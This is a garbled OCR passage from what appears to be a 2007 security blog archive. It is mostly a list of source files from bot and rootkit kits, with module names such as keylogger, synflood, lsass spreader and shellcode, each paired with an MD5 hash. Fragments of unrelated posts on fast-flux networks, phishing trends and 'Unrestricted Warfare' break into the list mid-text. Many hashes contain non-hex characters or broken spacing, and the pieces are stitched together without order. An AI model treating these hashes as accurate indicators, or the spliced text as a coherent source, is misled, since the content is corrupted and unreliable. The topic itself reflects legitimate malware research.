content results in the download of a malicious downloader stub executable (session.exe) that 
is then responsible for attempting to download additional malicious components necessary 
for integration of new compromised hosts into a fast flux service network." 


The fast-flux, the javascript obfuscation, and the process of serving malware still remain 
the same, so they’re basically doing what looks like maintenance of the fast-flux. 


1. http: //ddanchev. blogspot .com/2007/11/large-scale-myspace-phishing-attack.htm 
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cfa997debc089ce470d5d8dfalafbfif 
Sfc.cpp 
4f79a791fddfc3cff48ed36c57aa444f 
Sfc.h 
€424184367afc273afc254a3087e6585 
shl.cpp 
9270858778c7c905f5bcf7a6825063e2 
shl.h 
ae713dbdbfcbbd1072e2a2f4e64dd920 
sniffer.cpp 
ale6e0f918b2347481c9f9d0ed929a96 
sniffer.h 
b8aa229d1a548fe6c31b6e0d5d1d0364 
stealth.cpp 
c8dfe28095330f24a9faecb365adecfl 
stealth.h 
c2ae15c42953e75713e86fb91bec50a6 
sysinfo.cpp 
6271803693cel4efcl10b8cf5437b2f38 
sysinfo.h 
f04eb929f9eb5e55bb5f5ec4d3c8ce63 
tcpip.h 
5b45427b166615f442063eb611e4649a 
transfer.cpp 
1f8d84c1665be355ed48a5bf80f8967b 
transfer.h 
ac236ad8be6ffaalb1b8a4b130039511 
unhook.cpp 
93b009ee6d77385886d2297aalc4fdcO 
unhook.h 336e797d5a29f494895cbd9af18b2796 
wkssvc.cpp 
28c1f50abfbdad431a21435ff3d9722e 
wkssvc.h 0924ac6712d68a279b367a198eb25a4a 
irc.cpp 
65506708042926c6b373ac72762d9b69 
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irc.h 

d0aa95c9c904414a60034498579296c0 

irc.cpp 

cfc3b6cbed8767b5cf72a9e7a63ca9c9 

ftpd.cpp d5690058a602717f6a55c2c597061f18 
ftpd.h 

97e1f9bb89ceebfd33af8bb739adfc98 
identd.cpp 
ba0fldb636e3501752c0f02f9d80bab5 

identd.h c5b8e1286f05620636866ae849060100 
tftpd.cpp 
8ec9ab62ced789ec5c96dab6325e7594b 

tftpd.h 

3cd3302ff2fe971518394cf4bd479126 
bandwithflood.cpp 
9f65f2eb47da46b4aea3c61a4088919b 
bandwithflood.h 
482493df8bc565cd396412936913ecae 
bugs.txt 47a054ddf3d51c43dedbfb6fce9fcef8 
changes.txt 
5326b351a7b1049cd04d68f742c477f6 
commands.txt 
Oad8bcf070a32231f0c514ee38c45f57 

todo.txt 4ba41a2bf8d50040ed8071984daf5ee2 
driver.sys 
837dfeccf6df521ded4a3887350199e4 
hook.cpp 97193d146117c277b2f7ff579795592c 
hook.dsp 979459ad9f1e8b309e23a41d9d585817 
res.rc 

044cb70bd95ea4a65d797b512491cle7 
driver.sys 
837dfeccf6df521ded4a3887350199e4 

hook.dll 6a6c1dad9b52057f815b9d4ca5e962cb 
config.h 3ecffdca5159f4546201d069ff2344a0 


defines.h 
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fba25f6e38c34859e708a908fbfa4472 

externs.h 
51592968489b9f605ee96d5e2b18e7f9 
Isasspreader.cpp 
fdfde4277302eeleffb40a51640c2119 
Isasspreader.h 
f97df8110f40e45ea364d87f320f1303 
optixspreader.cpp 
7¢276bd217897b0a442ea4fca5a22456 
optixspreader.h 
ad78817ca372a5e6cl1dd201677617aae 
hook.obj e3e66b9d9c97c044f6cab48099ff63b0 
hook.pch b5fb2f42477e0d4006b8568e2a21cd07 
vc60.idb d8c1d9d800834f69d2439b0blee6f4aé6 
Driver.cpp 
da597ef704450dc6904423517235ef90 
Driver.dsp 

1f7 e4ff782992330e6ed605d6b8acfbf 
Driver.dsw 
846ff40dec86f0d4dd4692dd0e3d7e3f 

Driver.h 7404062b35f7bd208c655743a0244550 
Driver.ncb 
79ed9635dcd429b20560006363a38725 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 

Jiurl PortHide.cpp 
cfa49de552c06a8dda5fca38f35ab4le 

Jiurl _PortHide.h 
3e0d1188486e85ce18678cea28066cd0 

Jiurl tcpioctl.h 
3a7eba644b780e2a0f80a2ef84a4d5e3 
ProcessName.c 
cleabda9fe46de0f319ab6d9e9FF7399 
ProcessName.h 
f9151b283bf37ae51fd410fdacd8a962 
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Rootkit.cpp 
7c1e5237fa63ec2cc706eab36ddb1f8d 
Rootkit.h 
020c7d2c685ecf554c32ed643bcc8c8e 
dos.ico 
8bb01¢c24b328e5f079505ba9f7e68cd6 
encrypt.exe 
7d400a514eebececabc78541fe5cb5e4 
reptile.txt 
1e164f51a7f25533f347057b3b7cfb05 
crc32.c 
c2e731d846a546c707ffbb7e35a8df40 
crc32.h 
372bf1d98a03d788ca4f072b27825703 
rBot032.cpp 
79a784ddfe01260f71224cfbab4e7e00 
rBot032.dsp 
66fd80cc0c04308707ad90ed27eb51d3 
rBot032.dsw 
8c589477e840a49afc4b633523970153 
rBot032.ncb 
2868fd81717c6db4b187b1aa2b57f344 
rBot032.opt 
312b31e8c87e34b8a9933c5ff3735348 
rBot032.plg 
93822d979b1702d45d54bda5e6ece36f 
s MyDoom.pch 
3f3e3e996248dba441a4a5c8aa447e61 
vc60.idb 2bce749686fa8143014bb03962b1241e 
vc60.pdb 9fel2e74b3080fe98acafacc407bbabb 
frmMain.frm 
eea4e19ad4ece76da07a0040cbe513af 
frmMain.log 
3638c2bf48dc02clad91fff2dfa7af7c 


advscan.cpp 
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10e2288e4d49a1b546ff291bd2ea642f 
advscan.h 
5c5f7fo1lb7ed612771lab2bdcO1lab9f9b 
commands.cpp 
9844c8d22be272b85f615844ab359c1c 
commands.h 
156cbd7be22fde0d3da607da767b06b8 
configs.h 
18dc6e10f22c2f104ee6c78e8ea949cd 
crypt.cpp 
f03cca9691dd9ad588e4287524021c3e 
crypt.h 
c2edef9177543e1b8a8611d347d99b66 
defines.h 
2d093e05e7eb70067449ee63e8858707 
download.cpp 
2b17d55de73f19dfa454d78dd579a966 
download.h 
7d76f3d722d56c65e89e58b2bb8eb3bb 
externs.h 
bec452f7340525a0dcf26debddb44d7b 
fphost.cpp 
4ed83bbbb13dd03a096c88ea0b65b80d 
fphost.h 16bcf101fadb9e3021c0ddb78302e83f 
ftpd.cpp 210b53d0e5cc338486b54433018632al1 
ftpd.h 
da4f3d35010ladb59be91cal6fec3be2 
functions.h 
3c3e7d40f950c9821d5d36170a6eclea 
includes.h 
a09c42bc97f561364ececded1f729618 
info.cpp 8fc5b2e54f09d3f5455bb44882cef65f 
info.h 
70994ba4e7570710ddc3a4c91e494c22 
irc.cpp 
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b48114a264d5b2fe27b00bb0fc819bbb 
irc.h 
1261d7930e35b8c5254d204315f6ca81 
loaddlls.cpp 
9f98cb5af28b3ea9fb42d9784edad1f8 
loaddlls.h 
13a2104e91d2f2ce81ab5281ae269c07 
netutils.cpp 
9¢9f538c37543c494099cb1e17886438 
netutils.h 
eda5c802d5c8d72d14e13ec82c3e9cc6 
protocol.cpp 
de1c68e1fa39ac497d866f536a703e4f 
protocol.h 
4ec32d7b0cbc1c817ea87c6f9949a0F4 
regcontrol.cpp 
2fe90dd6cac60e88ab6ca3ed83d424d6b 
regcontrol.h 
dbc9b0243d5f43c1ldad546b5e3bf1c80 


reptile.cpp 
001a54b1292b31708e2c52e90b93092d 
reptile.dep 
6fa3b86313e460467999c7bfb8c41f7e 
reptile.dsp 
7f20bea4cbd2458b68c610eb1a1661f0 
reptile.dsw 
a7097dcfc065b5e433a8749ac55db41f 
reptile.h 
1e13d2301a263a27b82bf5f0fbae35d7 
reptile.mak 
eba2043ee1f3199923304e711cc2dal10 
reptile.ncb 
1ea51f96b167c755022ac400f23aee99 
reptile.opt 


df003d28d6b885acac693c9dc4961b9b 
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reptile.plg 
cle4b187adb46df6bd771b290e0f8f2c 
reptile.sin 
90bf17a33618855383b5e5a6adfaf357 
reptile.suo 

d826e67 80f9f7 7f8f92586934f997a2b 
reptile. vcproj 
f320c52e237ada5286488b3b4cf6cdfa 
secure.cpp 
ccb9d2831fb465e9156e803e26e5950a 


secure.h 3e5e65e967be2469a4544b29c9e41654 


service.cpp 
4395519fbd3d301f873c386bec2da638 
service.h 
792e15803e093c9fc96cafaabe7aea20 
strings.h 
17bb5ec147afffc3cb891cdce111350f 


stub.exe 5d9e0094c47b9de4473beal1d966c4f96 


tcpip.h 
79725214f0b5403596f64d2f15d50240 
threads.cpp 
2019511ddf17d9bff6e9002ec710d1laf 
threads.h 
e€141159d5a92d05d847a30925990519a 
utility.cpp 
cldf9a17e415f6865d56737fe0c65988 
utility.h 
7df2504032ae21338e72af3581af7604 
buildfre_wxp _x86.log 
cc05e80e6ea5c9894245bea0d759b612 
Driver.cpp 
da597ef704450dc6904423517235ef90 
Driver.dep 
b861b8ba4bb430375edd8385ce9b27ad 


Driver.dsp 
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d2dde18a89962bb61474a734787bd587 
Driver.dsw 
846ff40dec86f0d4dd4692dd0e3d7e3f 
Driver.h 7404062b35f7bd208c655743a0244550 
Driver.mak 
617a57805da9f7a08f7eb844d8e32150 
Driver.ncb 
7303a96a80dfa38b28fafc258ca400al 
Driver.opt 
b0af0d7cb397eaed1dab9afab6b4d32cd 
Driver.plg 
8208bbd5313ee2a60d4425eb69d99ca0 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
Jiurl PortHide.cpp 
071c4cf4cc8f4ef9b88b122852cc95a9 
Jiurl _PortHide.h 
3e0d1188486e85ce18678cea28066cd0 
Jiurl tcpioctl.h 
3a7eba644b780e2a0f80a2ef84a4d5e3 
ProcessName.c 
cleabda9fe46de0f319ab6d9e9ff7399 
ProcessName.h 
f9151b283bf37ae51fd410fdacd8a962 
readme.txt 
828fe34c7fa5794c4cb1bc024dd72153 
Rootkit.cpp 
b10f5b824bb2d31e8936c3f33e6e5250 
Rootkit.h 
020c7d2c685ecf554c32ed643bcc8c8e 
cmdlist.txt 
9d4b0252138c69c59720d95f9ec121f7 
encrypt.exe 

cab02f8eal 9ffcf756782bc1056438e3 
encrypt.exe 
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cab02f8eal 9ffcf756782bc1056438e3 
buf.txt 
08957cd9ad643ac8455b0cfb33720ded 
icon.ico 76685dfa5860561a421b7acc5f5c37fb 
resource.h 
f2f1500e77505ed3fcbe126c72ad8d29 
advscan.obj 
90c686c1lab007ddf88dd4f5b4117d002 
commands.obj 
027cea6a9810e8e609486738a0147d74 
crypt.obj 
f1b4b3b5cf135eca26d139a6569e331f 
download.obj 
191cb11d6ccc497811b01ccee5dc5a46 
fphost.obj 
ecf781f6b6b1239952bc9f0ceea65dc3 
ftpd.obj 6da5c8fledcb2b1ec8b1282594344404 
irc.obj 
7a6766316ce2f65437bc509655cf2178 
loaddlls.obj 
4dd244b9ed3885867b9a683391b9fd4e 
netutils.obj 
09c14241ba236e7f177cad1aal1b53a31 
protocol.obj 
71f02d1fde78141b8e880e75ccb4262c 
regcontrol.obj 
50567da099361eaa8b31c9bf08b26309 
reptile.obj 
67a20acee761839a6046830d1981162a 
reptile.pch 
abf1408df25a21407ebfd87b9aeal2d3 
secure.obj 
a4d9314e83fcd345beef05903f0d29a7 
service.obj 
€8229402bfe05f46a93cfb8c9d8b392d 
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threads.obj 
3270e333789166d799622a470df8d221 
utility. obj 
c5978c90bfa7e40126af719b6ce85ef8 
vc60.idb 48f99d2b24756990f96d8b4398b27608 
remove.cpp 
bec30fa04730b0e8f3dc5b9b3bf49bca 
remove.dsp 
224a1dadc892b4c2f45272926f3d100c 
remove.dsw 
6c87112017aad0a5ce8acaa25d6806c5 
remove.ncb 
6949d0cc6af6dce402f18e5452fa808c 
remove.opt 
26efa5afa0f4cdaedfe415d7b73463c1 
remove.plg 
25df4522c7f38244827e8abb267edcaa 
remove.exe 
620713b7b5f98067c34d73906399e796 
remove.ilk 
332c049c848805f02aa8f67435c34b02 
remove.obj 
cd1135f378e949b2735e1e827b3f7ef4 
remove.pch 
6fd7652042d3bbb14a63042d9d2820cb 
remove.pdb 
e7ef9676c7a7aa220a1275529b08fd6c 
vc60.idb 838fabe48c57c547c04701d77b9e836a 
vc60.pdb 68bfe44fa61d0cl16c9a2f5efc2d96f8a 
remove.exe 
adc0c6fd5a249284127498d485ab4ce0 
remove.obj 
23c33366be2316ff2aelb1a8f4647035 
vc60.idb 3cad05655563a3c09e6728db6c34bf6l 


nzm.dsp 
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2. http: //ddanchev. blogspot .com/2007/09/storm-worms-fast-flux-networks.htm 
3. http://isc.sans.org/diary .html?storyid=3060 
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WindowSecurity.com have just published my second article entitled "[1]Phishing Metamorpho- 
sis in 2007 - Trends and Developments” : 


"During 2007, phishers demonstrated for yet another consecutive year their persistence and 
creativity on their way to socially engineer as many people online as possible, into believing 
they are who they pretend to be. Why did phishers embrace economies of scale during 2007, 
what factors contributed to the constantly shrinking period of time it takes for the phishers to 
come up with a fake email, and how come that despite all the public awareness put into the 
problem, people still fall victim to phishing scams? This article aims to provide an overview of 
the key factors that contributed to the growth and evolution of phishing during the year." 


An article, which you'll definitely find as informative as the first one from last month related to 
"[2]Popular Spammers Strategies and Tactics”. 


1. http://windowsecurity.com/articles/Phishing-Metamorphosis-2007-Trend-Developments. htm 


2. http: //www.windowsecurity.com/articles/Popular-Spammers-Strategies-Tactics.htm 
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ef1e4738f2a7323d1c70f4b22e3f0a44 
nzm.dsw 
624ab1d6ccO5f0dbea9068eb6137feec 
nzm.ncb 
93d75c3bf589d785436b69a12996bcb7 
nzm.opt 
9e9e4fd5a855eelfa9eb5e6fa75f2cb4 
nzm.plg 
d750ad03ad6c2b2e4c9c10378c361821 
cfg.h 
ed7ac9b3145120cdbce6168d6e32cc93 
vncps.cpp 
fd205579105cc83e0fd983el18fd5315a 
aliaslog.cpp 
831laeea77fa590999ea7cb21c084613d 
autostart.cpp 
€4865d3674e5402dbd98aad4e92412ef 
avirus.cpp 
d3a7e0771a691b3aa4653332e8f48773 
crc32.cpp 
eb17deaee053524f4cc29eab31d0bddd 
crypt.cpp 
a5898b8ff50ce3925f5b0d962ea6f3b3 
download.cpp 
27e3d600249fddb7c94ff86bf4fdff36 
driveinfo.cpp 
42e9e4b60b6902e4700979502f16b86a 
ehandler.cpp 
eadfc7bdfe539b5e6501df39a4059485 
fphost.cpp 
dae10ad7177360d203ab4149bc721c9b 
ident.cpp 
2ed058e643bf25d4a29b0efc93b8265c 
irc send.cpp 
45cc6b478059c28e039d32ebfedb25c8 
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loaddlls.cpp 
a5e33dc3ca7e8b5d363aleabc40afd8c 
misc.cpp 7ec4770962e18a9d65aee4c68af454e2 
net.cpp 
51414aa8fe6f517dce740967fd217460 
netutils.cpp 
0d2b093e763597769bee0297c72d2d01 
nzm.cpp 
0d44c47366ce357b9415fdeeadd6a3ab 
peer2peer.cpp 
26652dbebf0c798b7700a5316b96c634 
processes.cpp 
d82131dfa0fb50405fecfl7a56653e4a 
random.cpp 
bacda003f928faad42285546c6bbdcf6 
rndnick.cpp 
3b8ce952e12314f1la080d8bf0d19d272 
session.cpp 
d233bcad1bdb8c3fff3fdbafea714e89 
shellcode.cpp 
02f4a5601laec9d5fla5f2ddd8879ce5f 
sysinfo.cpp 
bOdfb00fécf3be0d7e20f349eae7745a 
threads.cpp 
b0869845e3082465a3ae2ce0e1303b2e 
wildcard.cpp 
5f95acc7fa856262bd5a9bdd05b86c8a 
ddos.cpp 2b42f946f35020a522445ceac03f5916 
icmpflood.cpp 
c0a58537d3b37b433f9cla75dbfddabb 
pingudp.cpp 
bb40f6é6ebfdebla73acd6b4dda87bbcd 
supersyn.cpp 
a7664145a202dee4c9c6b98f8f53ee73 


synflood.cpp 
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99147203945509439f917b663a3b0528 
tcpflood.cpp 
c19462abed0023521f07abf908adfOFf9 
tcpflood2.cpp 
al866488bf0b2de298b4b75cea74378F 
Asn.cpp 
467439b2798126d6a7f6ea9a540785d5 
clsass.cpp 
b5481f45acac847d6cc4c636e71079de 
dcass.cpp 
21be53bdef645af48fbob224ba99a4a89 
dcom.cpp ela6blf7dbel7ec9f0c63c5033e22e45 
Isass.cpp 
8da03139779d188448ba5323e051ef5d 
Isassllsass.cpp 
5a0771481b9a90ac6a4bd26fcee91f3d 
mssql.cpp 
f82b32936c51b616fddal23645e31lacf 
mssqllsass.cpp 
c07cac3d7f400da3c0854a5f79806b69 
netapi.cpp 
19¢c22b737aa0a5c94630478d1f67b1e2 
pnp.cpp 
8fd24d81784fa9f7cccd2ef01793f0cd 
realcast.cpp 
70f3f87 ef679829e33f2ae98b63bbd9e 
sym06 _010.cpp 
c6f24fal30816c0af45e39e35459fcda 
vncrooter.cpp 
48dc162a35edefa976fla0fccefe2ec4 
wins.cpp 42a267c014db4a1fb95240acde5a9887 
wkssvc.cpp 
2f837143d6d22fac428a8689c727436f 
capture.cpp 
6e06ebc6f2215300a87088ae182b9ced 
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cdkeys.cpp 
1752a34e6d7d986bb918f83ceca23035 
dcc.cpp 
f5d3ef06222bef48e244c797a17c27c9 
findfile.cpp 
79f2afl49eeab89a4f527bf664fb990d 
findpass.cpp 
133c8405971cf9a94613d6efa68f3a48 
httpd.cpp 
6d2969ed87ca82a39c8c45cc795b99e7 
keylogger.cpp 
603598b63bed71e4b7efébba9f0203b2 
psniff.cpp 
dcOdab6c446e69f1747a84f080edf90b 
redirect.cpp 
eOac9cef5ea9f61f41cc3726c3699248 
remotecmd.cpp 
9c07c659b40eabe9f067838d80c40946 
secure.cpp 
adfa79c6426febc878498f0381c5f0fO 
socks4.cpp 
10af0b820c2e09f5c384c786calffef9 
visit.cpp 
60f03c5533af3a0d513986fb389a9e51 
advscan.cpp 
78bf724d88a1d9caec95524a11a4142e 
scan.cpp 9494dfd268fff82f7c6acc6d66295c96 
ftpd.cpp 328a73baa604alae869990a75ddf662e 
tftpd.cpp 
e0ab31ce900414086af0e028e7e4193e 
commands.txt 
d55fc5fe731a59a92edeabb111f8901e 
nzm.jpg 
716d5fcb2cba5a117dc3579e6a57216e 
Thumbs.db 
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0a3f2d3fb44d7fdb37df729819d1d15d 
advscan.h 
69c94ef2c99020746c1e4f3871ef013d 
aliaslog.h 
5190cd5c6b9af768d2f12ec53a33539e 
Asn.h 
4394a58ea6964bf9a024335d05c9616e 
autostart.h 
a346ce96fba3d146d6db423516453504 
avirus.h 5f7878ec5edf81f7c7374f2c530dff22 
capture.h 
c9b9a98f71e58aa5c95fa7e22def6029 
cdkeys.h eObf3b6a764f23ccf8d8b32a05985038 
clsass.h 8e0336973a1f5842c2d57d4e615e208f 
crc32.h 
8ccb9e857c9cb41f21eb3c493a71413d 
crypt.h 
€6a525ef1160950005b397926308c750 
dcass.h 
4b1d02dde13f7f25e6b252f9d5fe478e 
dcc.h 
59993ef594caf2cf41a2a49195c78eab 
dcom.h 
9d0c31dla4aacb69f45f9de51617e50b 
ddos.h 
755db82f748d3713e5f5c1756ad930d9 
defines.h 
b6d859940b89d8cc861fae34f2216b60 
download.h 
87b2f888818aab05cf88fa4c72b94827 
driveinfo.h 
592244a945306749409db5f7e8236ebb 
ehandler.h 
7e€240b2a256fd7175288bfcb9b3f0afb 


externs.h 
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a6bfa3ad1383928aec72f9654001fcbc 
findfile.h 
e7964ada0bal9576c35caa348a9fled0 
findpass.h 
d6fl2ac593da98e6labf82cfb9d7b853 
fphost.h 4e18e2c0e05b3902660684c7d6f52ad8 
ftpd.h 
bee3cc2dd90b09d6002faddd7871d5e2 
ftppot.h 6f23f8b4c2b1684e2028e4f0e2ef033e 
functions.h 
1557ce234058d139a95c1d4675509e85 
globals.h 
23775cbc6968cac7f94add3646c4ad04 
httpd.h 
46539c7bcd1cb4d91f1l4ec426aea7459 
icmpflood.h 
d03b9e0al156caed926e0c6509be75fe2 
ident.h 
b12d04376ddba020bb614b28f643d722 
includes.h 
e337cd018b6178585dccca2a5d0fbbbe 
irc _send.h 
94345b8777c46d3f67dfc088b5206190 
keylogger.h 
998e7a3a5b99ab6f893fdd49ea336ffO 
loaddlls.h 
33a51d5702427f1035eef60ccbca289f 
Isass.h 
da704f3106e215af2e1b40eb/7ffle9ef 
Isassllsass.h 
96c25be3a04398fb09a76ffd7c21c03b 
misc.h 
8e2b1dfl0fb00d1b0ac04d0b3f2f4943 
mssql.h 
dad3ee87222e56569de606559cb6e64de 
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mssqllsass.h 
b8e8568851fbe532291b46211cdd930e 

net.h 

e7d2cbe50a915c90c44fbb05c12ddeec 

netapi.h 76d9d327ae39c40301de1982da543922 
netutils.h 
045df2759c4c65dd18ee2fda4f2674d1 

nicklist.h 
€267b6bc88d23669d999c9F795c79497 

nzm.h 

92ff8585cf0a5e6dbb6097b30002dd4c 
passwd.h 21ba8469c127a4cc3f96fa939bc5fa5e 
peer2peer.h 
98a87d72f519eb3afle8288f76d3e44f 
pingudp.h 
5f919f9a14b8b68b9640c79d16b259d6 

pnp.h 

a6ea8al2b4309238b675c82cc04c6438 
processes.h 
95283f0340970a60121daa28ce4e5c86 

psniff.h coe37edb73cc5afc289a81444b05d575 
random.h bfc43fc76fb94a2bee83e6782a3albad 
realcast.h 
d7al14d60ffeab5efllde39ba64cce2e4 
redirect.h 
91eb59e1991fd1251e389b9942f1a381 
remotecmd.h 
7f6d9972b1e54786539c1df72205be44 

rfb.h 

c6975ff98f701dbd755b61f57299fe31 

rndnick.h 
96313d83a017a0e87b9dc6664540a3ad 

scan.h 

4d5a41fa21277d1948c4c508c16487e1 
secure.h 8ca61057edab3e221f0981a85e31bebd 
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session.h 
2e24eb8c867c37c2e4a083f41179a668 
shares.h d3a002008bd6e81af770acceb9534e42 
shellcode.h 
4ee1152c4ded683eb147c642dd3a044a 
socks4.h 25d729e47f7d550a16c46813c3c35f11 
supersyn.h 
c16fd14001ae1688a2578dca555151f0 
sym06 _010.h 
8092927570fd990f1c0063dc87d9d942 
synflood.h 

268bb714d89832a594887 3dfdba0655f 
sysinfo.h 
396a06be63c7eb62b1c04fb9fffd0667 
tcpflood.h 
c€11f092429b504a9dc56af5e05318d6b 
tcpflood2.h 
00271f68380e76fd220992702fc0a48e 
tcpip.h 
bf069e59cc4841e231a2ac1815c86044 
tftpd.h 
08a46fc3eleea39ac39cfab482287039 
threads.h 
5c1a437b21e6leech8e786137456009c 
visit.h 
b15ed3d6348b577ce5df3bad37721aff 
vncps.h 
57be5a0c203553253e96d0fdaclfe9de 
vncrooter.h 
0b6ea36c17a2a3c4c7cfbf665de42b5e 
wildcard.h 
c141f0f78a8e100094737a65a86f8c6b 
wins.h 
6def08395cad95ac3716b2ed5b2dac61 
wkssvc.h 0924ac6712d68a279b367a198eb25a4a 
12230 


Botcash.cpp 
cf7076db568cb8b577fb7d25019f927c 
Botcash.h 
c60371cd1314ca82b620ef3f44cc8cl1d 
Commands.cpp 
90e2b232d87937687cb38f95eb32b436 
Commands.h 
51fab58daa86c08f220a01665bb4ed79 
commands.txt 
3437092e32c840a3b6954398e4243fc0 
compilation.txt 
744eea5445727d77a4314c5093a329c8 
Config.cpp 
Ocec90dc91e944c4ededbcca725b30fd 
Connect.cpp 
dc783b32879b9e581ffe90fcb2bf845c 
Connect.h 
63047b0e0300143bd8d7415fc66ffaa2 
Crc32Static.cpp 
6ddacb1le12172fdf9f03b0852ca867cb 
Crc32Static.h 
28671d1ff616d04d02244217bde0a807 
CThread.cpp 
f3af3664b961a05d660b2eee328f1748 
CThread.h 
f4cc50f8156bacd685927a8c9bfOOdff 
disclaimer.txt 
9f6ccefb780a3e8fa09b3a69b0a4d85c 
doc.txt 
4d3c569c3d328d7aeblcbebc730bb9ee 
Download.cpp 
15b707b0ac44fd9e7724c575134d281e 
Download.h 
3281d0aca70a3ffoc0e5ca3327d1143b 
Globals.h 
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05a790554889d2df6aa87b6b59865ff0 
Hell.h 
1f04522a1e6365e6ac22f783788a56ee 
HellBot.cpp 
b37396f2c919c06b0bf18alef946df78 
HellBot.dsp 
f49731d90b3f088288ba03a7000146a2 
HellBot.dsw 
f975c66e02221341bd969f8d5a303470 
HellBot.ncb 
afd4507483ba65a55104a5924f4e846a 
HellBot.opt 
3¢7d337d4777712d1888590770ee555f 
HellBot.plg 
2daad1806b0f514292d1ff131b241e01 
HellMail.cpp 
6c2e796ff2c2f7ad270e97acOed91ac5 
HellMail.h 
89be94991ec9476c3af798fb4a7861b7 
Include.h 
5280bf481cfd699afe602ca07ba37927 
Main.cpp 6ef8b6225731d1lee2e220708e80e46a0 
Main.h 
b78c7d89c6233e3f95826652f2c55420 
polymorph.cpp 
6a867023e5aa8200db2bfbc800409eeb 
polymorph.h 
f5b4320335cd4175c8a2501185d3ea04 
sysinfo.cpp 
ddf0317b229df1fa0b6692b91c9b3c51 
Utility.cpp 
20d0c601f7af558be159a26cd49fb206 
Utility.h 
22¢894545e8d47ebeaea86297f3198bd 
lib.c 
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3.12.9 Combating Unrestricted Warfare (2007-12-12 23:08) 


It’s February, 1999, and two senior colonels from China’s PLA, namely Qiao Liang and Wang 
Xiangsui depressed the world’s military thinkers by coming up with a study on the future 
developments and potential of asymmetric warfare in a surprising move next to the overall 
discussion always orbiting around [1]symmetric warfare. The study itself entitled "[2]Un- 
conventional Warfare" is an ugly combination of Sun Tzu’s 3D perspective on warfare in 
combination with guerilla approaches to achieve one of Sun Tzu’s most insightful quotes - 
"One hundred victories in one hundred battles is not the most skillful. Seizing the enemy 
without fighting is the most skillful." Here’s a [3]summary of the study : 


"Two senior PLA Air Force colonels wrote "Unrestricted Warfare", presented here in summary 
translation, to explore how technology innovation is setting off a revolution in military tactics, 
strategy and organization. "Unrestricted Warfare" discusses new types of warfare which may 
be conducted by civilians as well as by soldiers including computer hacker attacks, trade wars 
and finance wars." 


During the years, and especially since 9/11, the tipping point acting as the wake up call that 
asymmetric warfare is also getting embraced by the bad guys, many other niche research 
papers were published in the context of information warfare and cyber warfare such as : 


[4]Chinese Information Warfare: A Phantom Menace or Emerging Threat? 


[5]Information Warfare: Its Application in Military and Civilian Contexts 


[6]The Spectrum of Cyber Conflict From Hacking to Information Warfare 


[7]Globalization and Asymmetrical Warfare 


[8]Cyber Warfare: An Analysis of the Means and Motivations of Selected Nation States 
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bfd752d1631b8bf3380581cfb1709309 
lib. 
7dfb677358f562e2870a3604ec8f4906 
massmail.c 
83a02ab83b1c67b60cc0151bfel6e33a 
massmail.h 
dc9b8730e05edd5b3130115542169f3e 
msg.c 
c9b2b2b2b49c520d9a2568e7c2a572fa 
msg.h 
970e7d05de9ed005b775494883aaft248 
scan.c 
1fe0904a93dd30felf7b9e013de56afa 
scan.h 
d817134f9251605fdb88463a52e56f63 
utility.h 
2075345d8959fcd8a3944f0c1611dea3 
xdns.c 
8e656d38d750f674f77faaedbf657al14 
xdns.h 
7cfb460570a881538d6bb6f5de3e0d9c 
xsmtp.c 
1a0715e6fld8ec171le3aac85dea90e42 
xsmtp.h 
6ade15e0991bbf6b2c7241c0a5e73244 
zipstore.c 
4ce7dfd8368c262fce48a924a242009c 
zipstore.h 
ee6ec5ba3dc59d24d6d5a6d452c55c62 
advscan.h 
2589adb7d502f93c0d7d6724c7d81039 
aliaslog.h 
5ab9c4b1902efad266b94b7930fb3ec7 
autostart.h 
f4fbe0c8b65385e430a777691ff7aace 
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avirus.h e55a156d28fde56a0bb05fc599dafecf 
commands.h 
63666e1d93c41fb3a552ba863d191ce8 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom135lsass.h 
bc7107ecaf2d45fb58372a9ca35df898 

ddos.h 

a660492055fc74283dc92f7f311d34c8 
defines.h 
6341747da57950b4a7f9fac565cc306a 

dns.h 

ab2c466be14b5bdc7926d3e51ae2d10f 
download.h 
187868409ecd324a855187414b397167 
driveinfo.h 
8f57049be20497bcab61df57618ba9cfe 
extern.h cbe6414cf04f573b11b14ea310486363 
fphost.h 72b9b3d4234fcbc5da07695ae3483c1b 
ftpd.h 

48a891506c957340b207b627105d7bb4 
functions.h 
baef36d4baf239dfd7d04b8971e7c438 
hostauth.h 
a5c89d3564e47d616ab4e64920a68d96 
icmpflood.h 
4462c6318220648820316848deb124fd 
identd.h d59ab0522f735c3d29ffd032870e522f 
includes.h 
8c6f53a3cf7942bdbaf3a320d27e114c 

irc _send.h 
65e70187da5c1166002c32a86a808194 
kazaa.h 
953491225ef2e56a36f4030533856a6a 

kelvir.h 15ec3d427b618615a3281cd245e501ed 
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loaddll.h 
d91dbc62cbb743d0d5ceea7527db8450 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.h 
a31598a33910bf135a473fc8f4e93c4f 
mssqI.h 
742394ed531laab2ecc958daf5305723e 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netheaders.h 
dce3ff7flb3f5e902e6a7485d174c287 
netutils.h 
82656db154a96c47d74069f4bccd24e5 
passwd.h 76459e9d8a479f2ef8ca2al1a6737f580 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 
redirect.h 
ef18c1f4e359e599dc28b5502f9af95e 
rfb.h 
04d6bd675ae235411f6f6a33a0e8e147 
rndnick.h 
26e98f60f0f8b3392elea0b4ad0e247d 
sasser.h f285bc67448b03f9d54a4ed5e62c58ea 
scan.h 

sdbot05b.h 
c81bdbc19e13c93fce3230bab69f6f83b 
shellcode.h 
cal14f267b73bc867b075ca56f524d52e 
skysyn.h c7d7710b27cce85f8bdea408945b238c 
socks.h 
b103f307ffO2cd98fe2bfbecbd19c011 
taskhider.h 
389c143483d51daec2eb37fdb78744al 
tcpip.h 
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41b08a9fae20869c4eca0bae6dc2d971 
tftpd.h 
b187f7ba95f4d498138c6d42607c6929 
threads.h 
35712dce6dfa1l4d1637cf23f5170a861 
visit.h 
5ffab31leb3db2a5c000bd789b4f46025 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
wks.h 
8elce6beaeb/ba43ede346b20f0d50c40 
wkssvc.h 236b0cc5f468b895bbe528e6e47ed600 
aspergillus.dsp 
6894a3d26eb2e5eb9139c66ec8c621c8 
aspergillus.dsw 
4cc2e883e2cc43fa317066d5960f8962 
aspergillus.ncb 
4238a9e33cO0a6dcb80a6b1dc13ed3ce7 
aspergillus.opt 
